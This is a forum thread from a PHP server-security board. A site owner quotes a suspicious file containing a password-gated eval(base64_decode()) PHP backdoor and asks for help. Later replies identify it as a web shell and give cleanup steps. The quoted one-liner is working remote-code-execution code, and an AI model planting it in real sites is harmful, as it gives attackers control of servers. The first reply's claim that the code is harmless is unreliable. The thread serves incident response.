maybe hacking

Discussions about server security -- questions and answeres

Moderators: macek, egami, gesf

wawawe
New php-forum User
New php-forum User
Posts: 1
Joined: Wed Nov 30, 2011 1:22 am

maybe hacking

Postby wawawe » Wed Nov 30, 2011 1:45 am

hi,

i have file thumbs.php in my server and this the content of it

Code: Select all

<?php if(md5($_POST["password"])=="beb89daa79e6174f2ca4288"){eval(base64_decode($_POST["code"]));} ?>


are this hacking?

if yes, how i can resolve it?

regards

wawawe

kc0pph
New php-forum User
New php-forum User
Posts: 86
Joined: Sat Nov 26, 2011 8:39 am
Location: Pueblo, CO
Contact:

Re: maybe hacking

Postby kc0pph » Fri Dec 02, 2011 9:48 pm

this looks like a hard coded password.

md5 is a hash technology that encrypts things. So its saying if the md5 of the password entered in = the stored value then do the code below. Im not 100% sure about what the "code below does" but it does not send any data to anyone else

TheProdigyGuy
New php-forum User
New php-forum User
Posts: 215
Joined: Wed Dec 07, 2011 5:25 pm

Re: maybe hacking

Postby TheProdigyGuy » Mon Dec 12, 2011 6:37 pm

Yes it is a probably backdoor.
eval()+base64().
And that 'scriptkiddie' evaluates his string as PHP code on your site.
So,he can wget new 'fresh' ) exploits to server+bypass servers security+can DDOS another sites +SPAM using your site.
Investigate from where and when that backdoor uploaded to your site?
Check your access and error logs.
Just do from SSH.
zgrep 'thatfilename' *.*|less
grep -r 'thatfilename' *.*|less
Then trace that IP.
I recommend to you remove all files from your site and update your software .Because it may contain backdoor.Shells like r57,c99,wso etc etc.
Also do not forget change yours mysql user name+mysql password+change your all passwords (ftp,cpanel,mysql)
your mails passwords+secret questions etc etc.
And finally make sure your hosting is correctly administering.
In some cases may be your script is not vulnerable but your hosting may be vulnerable to 'bypassing' attacks.
So, be carefull.


Return to “Server security”

Who is online

Users browsing this forum: No registered users and 0 guests

cron